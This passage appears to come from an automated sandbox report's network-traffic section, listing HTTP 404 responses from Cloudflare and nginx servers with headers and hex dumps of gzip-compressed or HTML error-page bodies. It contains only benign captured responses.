19 93 f4 ea f4 bd 56 e6 95 38 d4 c5 b8 32 3e 59 92 fe 09 82 5c 8f 0f 6c f1 7a 21 4d 5b b1 17 93 19 db ed 7f b9 79 b7 aa ad 09 9e 35 d6 36 1a 45 a7 3c 93 b6 75 dd 06 b0 e9 99 4a 11 94 35 29 bb 6e fd 2a f6 82 1c fd ee f6 c8 1d 62 d5 b3 35 cb 73 2c ff e7 48 6b c4 2a 05 1f 1f a2 6b db b6 68 82 f7 9a d3 9d c2 a1 ea 8f 01 31 eb ea 74 39 fe 3b 97 43 87 ad dd a8 47 fe 7a 55 9e 14 e4 00 2b e1 f1 a7 d3 c0 01 3f ea 32 5d a6 9e 0d cc ba 66 b9 e7 d0 0e cb 54 5a 87 cb 14 c0 ef e2 32 cd e7 2c 63 d3 65 7a 3e d9 9d 4f 96 29 50 c0 5d 00 0e ab 7d bc 1b 28 f8 6d 03 b3 e1 b7 cd ef 61 bf 6d 6e ff 7d b0 df 3e 9e ed 9d 44 e0 07 90 d6 48 11 50 21 3f 00 65 41 89 2d cb 74 e8 12 19 37 b4 4c 37 7e 23 38 fa 89 27 0e 35 0a 8f ac 55 86 6d fc 87 2d ba 62 c1 16 6c 02 c7 e3 e5 69 fa e6 ec b0 14 97 57 2b 8d 44 79 22 fa 60 93 c3 1f 6c 8f 15 79 93 9e 9e ed df f4 84 91 a2 26 3e 6c 85 23 96 7a 8a 97 66 3b 12 19 61 7c 08 6e 6f 3e 18 8a c3 a1 1b f7 78 42 1f Data Ascii: 5148dg(23`!@#e3p\uRKQL14^q
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 20:56:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closex-ray: wnp32840:0.000/wn32840:0.000/wa32840:D=595cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U%2B8Bx%2FvD%2BD58gbtVfOPIMqiEsPHnxZn9TZSuLJMW7WKUSODGh77EZCfzQwAxgE6FG1o5jy1s7F0cipLj57WwOs1xY9aTRjHVMqJ6loSs3Dc96mbQwxlMn5IlyE4Ap4loFYyp0aAALw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c1a9077a8e942fe-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 32 64 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 9c 55 4f 6f d3 30 14 bf ef 53 3c 82 a0 20 9a 25 ed 5a 3a 42 52 38 71 e5 00 9c 91 9b bc b4 66 8e 1d d9 6e d7 82 26 6d 9a c4 89 33 37 24 3e c2 84 a8 10 12 db 67 70 be 11 72 9a 76 eb df 0d 7c 88 1d bf e7 f7 7e fe f9 67 bf f0 5e 22 62 3d c9 11 06 3a 63 dd bd 70 de 21 49 ba 7b 00 00 a1 a6 9a 61 b7 e5 b7 c0 7c 33 53 30 bf cc a5 b9 30 bf cd 4f 33 35 97 e6 2a f4 66 0e 33 e7 0c 35 81 78 40 a4 42 1d 39 ef de be 72 0f 9d 9b 26 4e 32 8c 9c 11 c5 e3 5c 48 ed 40 2c b8 46 ae 23 e7 98 26 7a 10 25 38 a2 31 ba e5 cf 7c 1d a3 fc 08 06 12 d3 a8 36 d0 3a 57 81 e7 a5 82 6b b5 df 17 a2 cf 90 e4 54 ed c7 22 f3 62 a5 5e a4 24 a3 6c 12 bd ce 91 3f 79 43 b8 0a 5a be 5f ef f8 fe 43 35 ec 59 44 8c 68 ca eb f1 44 52 c6 68 5c 03 89 2c aa 29 3d 61 a8 06 88 ba 06 96 8a a8 a6 71 ac 6d bc 5a 05 a1 f4 98 8d 6d eb 89 64 52 2f 09 83 4f 8b 49 db 06 48 fb 03 1d 40 c3 f7 1f 3c 5f b2 64 44 f6 29 0f c0 5f 9e 4e a8 ca 19 99 04 90 32 1c 2f 9b 3e 0c 95 a6 e9 c4 ad 18 0a 20 46 ae 51 2e 3b 11 46 fb dc a5 1a 33 b5 d9 a1 47 e2 a3 be 14 43 9e b8 b1 60 42 06 70 3f 6d a4 ad b4 bd ec 36 b7 1d 74 5a 9d 56 ba 6c b3 64 bb 33 62 03 a8 59 6a c1 52 5b ab 83 22 5c b9 0a 25 bd b1 e2 64 31 da b7 c8 09 e5 28 57 58 da b1 e9 f2 e0 03 68 1f b4 f3 f1 ee 98 6e 2c 12 5c 8e 9b 51 ee 56 01 9a 6d 3f 5f 09 6d cf d4 2d f9 5a 67 6a 63 02 bb 00 fe 25 43 4e 92 84 f2 be cb 30 d5 01 34 fd 2d 5b 40 29 85 7c 6f e1 6f e3 a5 c7 44 7c b4 e1 10 14 fd 88 01 3c 6b ae 26 2e 8d c7 95 f6 3a be bf 49 7a ae 16 79 00 6e b3 bd 13 55 4f 52 4c ff 0f 56 e3 f0 bf 60 f5 84 d6 22 0b a0 b1 02 6c 31 7c 99 61 42 09 3c ca c8 78 ce 7d e7 e9 61 3e 7e bc 02 73 ab dc 6e 91 5c 89 94 e1 d8 4d a8 c4 58 53 61 f5 21 d8 30 e3 eb 7e 55 fe f5 eb 7d b2 05 4a 29 a2 75 38 95 52 02 38 58 13 d1 6d 52 Data Ascii: 2deUOo0S< %Z:BR8qfn&m37$>gprv|~g^"b=:cp!I{a|3S00O35*f35x@B9r&N2\H@,F#&z%81|6:WkT"b^$l?yCZ_C5YDhDRh\,)=aqmZmdR/OIH@<_dD)_N2/> FQ.;F3GC`Bp?m6tZVld3bYjR["\%d1(WXhn,\QVm?_m-Zgjc%CN04-[@)|ooD|<k&.:IzynUORLV`"l1|aB<x}a>~sn\MXSa!0~U}J
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 20:56:28 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closex-ray: wnp32840:0.000/wn32840:0.000/wa32840:D=894cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I%2FPYBh6H0Q5SOHN0EnsLhWcpHP1V7JQPSZ9nLMbTaX95j%2FZO8FtAMnGCUvxDIuh1QOPtQ4CxNV9IYoJZLyrkU%2FY9etjyR8ElIVYf2lZ17RjSioac8BA7iksPiztKtd2pHaRaaGc%2BDA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c1a9087cb3c7d0b-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 32 65 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 9c 55 4f 6f d3 30 14 bf ef 53 3c 82 a0 20 9a 25 ed 5a 3a 42 52 38 71 e5 00 9c 91 9b bc b4 66 8e 1d d9 6e d7 82 26 6d 9a c4 89 33 37 24 3e c2 84 a8 10 12 db 67 70 be 11 72 9a 76 eb df 0d 7c 88 1d bf e7 f7 7e fe f9 67 bf f0 5e 22 62 3d c9 11 06 3a 63 dd bd 70 de 21 49 ba 7b 00 00 a1 a6 9a 61 b7 e5 b7 c0 7c 33 53 30 bf cc a5 b9 30 bf cd 4f 33 35 97 e6 2a f4 66 0e 33 e7 0c 35 81 78 40 a4 42 1d 39 ef de be 72 0f 9d 9b 26 4e 32 8c 9c 11 c5 e3 5c 48 ed 40 2c b8 46 ae 23 e7 98 26 7a 10 25 38 a2 31 ba e5 cf 7c 1d a3 fc 08 06 12 d3 a8 36 d0 3a 57 81 e7 a5 82 6b b5 df 17 a2 cf 90 e4 54 ed c7 22 f3 62 a5 5e a4 24 a3 6c 12 bd ce 91 3f 79 43 b8 0a 5a be 5f ef f8 fe 43 35 ec 59 44 8c 68 ca eb f1 44 52 c6 68 5c 03 89 2c aa 29 3d 61 a8 06 88 ba 06 96 8a a8 a6 71 ac 6d bc 5a 05 a1 f4 98 8d 6d eb 89 64 52 2f 09 83 4f 8b 49 db 06 48 fb 03 1d 40 c3 f7 1f 3c 5f b2 64 44 f6 29 0f c0 5f 9e 4e a8 ca 19 99 04 90 32 1c 2f 9b 3e 0c 95 a6 e9 c4 ad 18 0a 20 46 ae 51 2e 3b 11 46 fb dc a5 1a 33 b5 d9 a1 47 e2 a3 be 14 43 9e b8 b1 60 42 06 70 3f 6d a4 ad b4 bd ec 36 b7 1d 74 5a 9d 56 ba 6c b3 64 bb 33 62 03 a8 59 6a c1 52 5b ab 83 22 5c b9 0a 25 bd b1 e2 64 31 da b7 c8 09 e5 28 57 58 da b1 e9 f2 e0 03 68 1f b4 f3 f1 ee 98 6e 2c 12 5c 8e 9b 51 ee 56 01 9a 6d 3f 5f 09 6d cf d4 2d f9 5a 67 6a 63 02 bb 00 fe 25 43 4e 92 84 f2 be cb 30 d5 01 34 fd 2d 5b 40 29 85 7c 6f e1 6f e3 a5 c7 44 7c b4 e1 10 14 fd 88 01 3c 6b ae 26 2e 8d c7 95 f6 3a be bf 49 7a ae 16 79 00 6e b3 bd 13 55 4f 52 4c ff 0f 56 e3 f0 bf 60 f5 84 d6 22 0b a0 b1 02 6c 31 7c 99 61 42 09 3c ca c8 78 ce 7d e7 e9 61 3e 7e bc 02 73 ab dc 6e 91 5c 89 94 e1 d8 4d a8 c4 58 53 61 f5 21 d8 30 e3 eb 7e 55 fe f5 eb 7d b2 05 4a 29 a2 75 38 95 52 02 38 58 13 d1 Data Ascii: 2e8UOo0S< %Z:BR8qfn&m37$>gprv|~g^"b=:cp!I{a|3S00O35*f35x@B9r&N2\H@,F#&z%81|6:WkT"b^$l?yCZ_C5YDhDRh\,)=aqmZmdR/OIH@<_dD)_N2/> FQ.;F3GC`Bp?m6tZVld3bYjR["\%d1(WXhn,\QVm?_m-Zgjc%CN04-[@)|ooD|<k&.:IzynUORLV`"l1|aB<x}a>~sn\MXSa!0~U}J)u8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 20:56:30 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closex-ray: wnp32840:0.000/wn32840:0.000/wa32840:D=866cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XcmG%2BstF6QGZ3oibJ9DO34QDsAYaexsuimzHvXyKGaxujZHsa84k92L54bVeYZc%2FHvuRSlXSbKLUXGlfbRYz9G%2BBfBAnZ386APMZYl%2BL4qmoArx%2F1BhPTfVbFzbnOM9WEQB%2FDN3zaw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c1a90978c0d72a7-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a Data Ascii: f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 20:56:33 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closex-ray: wnp32840:0.000/wn32840:0.000/wa32840:D=823cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VCZ9v4TUbt7AbR44Bt%2BkbYCYMDuKjeZjJUhkrraEHezn7XGRcKR34nlimyoDOQejofREhwW%2BfnAkRJwRG0eB74D61rB0rvT9omMliDCl2sFvXmNAbbHPhGKp1WH3HxuiZbeQMe3yrQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c1a90a77df442ca-EWRalt-svc: h3=":443"; ma=86400Data Raw: 37 66 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 d0 9d d0 b5 20 d0 b7 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 be 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 37 30 30 26 73 75 62 73 65 74 3d 6c 61 74 69 6e 2c 63 79 72 69 6c 6c 69 63 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 2c 20 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 31 66 34 66 35 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 37 34 37 34 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f Data Ascii: 7f3<!doctype html><html><head> <title>404 </title> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <link href='https://fonts.googleapis.com/css?family=Open+Sans:400,700&subset=latin,cyrillic' rel='stylesheet' type='text/css'> <style> body, html { height: 100%; margin: 0; display: flex; justify-content: center; align-items: center; background-color: #f1f4f5;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 11 Sep 2024 20:56:39 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "663a05b6-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 11 Sep 2024 20:56:42 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "663a05b6-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 11 Sep 2024 20:56:44 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "663a05b6-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 11 Sep 2024 20:56:47 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "663a05b6-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 